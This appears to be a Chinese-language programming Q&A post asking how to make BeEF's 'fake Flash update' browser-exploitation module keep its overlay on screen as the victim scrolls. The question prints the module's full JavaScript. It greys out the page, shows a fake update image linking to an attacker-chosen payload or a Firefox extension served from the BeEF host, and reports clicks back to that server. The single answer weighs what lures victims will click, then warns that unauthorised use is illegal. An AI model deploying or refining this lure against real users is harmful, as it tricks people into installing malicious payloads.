javascript - 如何将 float div 添加到 beEF 元素脚本

Question

在 beEF 元素中，有一个脚本可以执行带有灰色背景的假闪存更新和用于闪存更新的图像。问题是当用户向下滚动时。背景和图像仍然在页面顶部，所以我尝试编辑脚本并添加一些 jquery 代码以使其在访问者向下滚动时移动，但我做不到。

//
// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
  
  // Module Configurations
  var image = "<%== @image %>";
  var payload_type = "<%== @payload %>";
  var payload_uri = "<%== @payload_uri %>";

  var beef_root = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port;
  var payload = "";

  // Function to gray out the screen
  var grayOut = function(vis, options) {
    var options = options || {};
    var zindex = options.zindex || 50;
    var opacity = options.opacity || 70;
    var opaque = (opacity / 100);
    var bgcolor = options.bgcolor || '#000000';
    var dark=document.getElementById('darkenScreenObject');
    if (!dark) {
      var tbody = document.getElementsByTagName("body")[0];
      var tnode = document.createElement('div');
      tnode.style.position='absolute';
      tnode.style.top='0px';
      tnode.style.left='0px';
      tnode.style.overflow='hidden';
      tnode.style.display='none';
      tnode.id='darkenScreenObject';
      tbody.appendChild(tnode);
      dark=document.getElementById('darkenScreenObject');
    }
    if (vis) {
      var pageWidth='100%';
      var pageHeight='100%';
      dark.style.opacity=opaque;
      dark.style.MozOpacity=opaque;
      dark.style.filter='alpha(opacity='+opacity+')';
      dark.style.zIndex=zindex;
      dark.style.backgroundColor=bgcolor;
      dark.style.width= pageWidth;
      dark.style.height= pageHeight;
      dark.style.display='block';
    } else {
      dark.style.display='none';
    }
  };


  // Payload Configuration
  switch (payload_type) {
    case "Custom_Payload":
      payload = payload_uri;
    break;
    case "Firefox_Extension":
      payload = beef_root + "/api/ipec/ff_extension";
      break;
    default:
      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');
      break;
  }

  // Create DIV
  var flashdiv = document.createElement('div');
  flashdiv.setAttribute('id', 'flashDiv');
  flashdiv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');
  flashdiv.setAttribute('align', 'center');
  document.body.appendChild(flashdiv);

  // window.open is very useful when using data URI vectors and the IFrame/Object tag
  // also, as the user is clicking on the link, the new tab opener is not blocked by the browser.
  flashdiv.innerHTML = "<a href=\"" + payload + "\" target=\"_blank\" ><img src=\"" + image + "\" /></a>";

  // gray out the background
  grayOut(true,{'opacity':'30'});

  // clean up on click
  $j("#flashDiv").click(function () {
    $j(this).hide();
    document.body.removeChild(flashdiv);
    grayOut(false,{'opacity':'0'});
    document.body.removeChild(document.getElementById('darkenScreenObject'));
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=user has clicked');
  });

});

Answer 1

克鲁奇。坚持使用基准 BeEF。如果你把它扔到用户面前，他们会认为它很粗略，不会点击它。您必须像这些攻击所针对的人一样思考。如果您是用户，如果它在整个页面中跟随您，您会点击下载内容吗？当然不是!

最重要的是，坚持使用普通牛肉。他们做对了。

此外，您可以使用它的唯一合法方式是您出于测试目的对自己使用它。由于我的背景，我必须提醒您，除了对自己或同意的 friend 使用 BeEF 外，任何使用 BeEF 的行为都是非法的。 不要测试警察，也不要愚蠢地通过互联网进行测试。它会让你入狱。

干杯!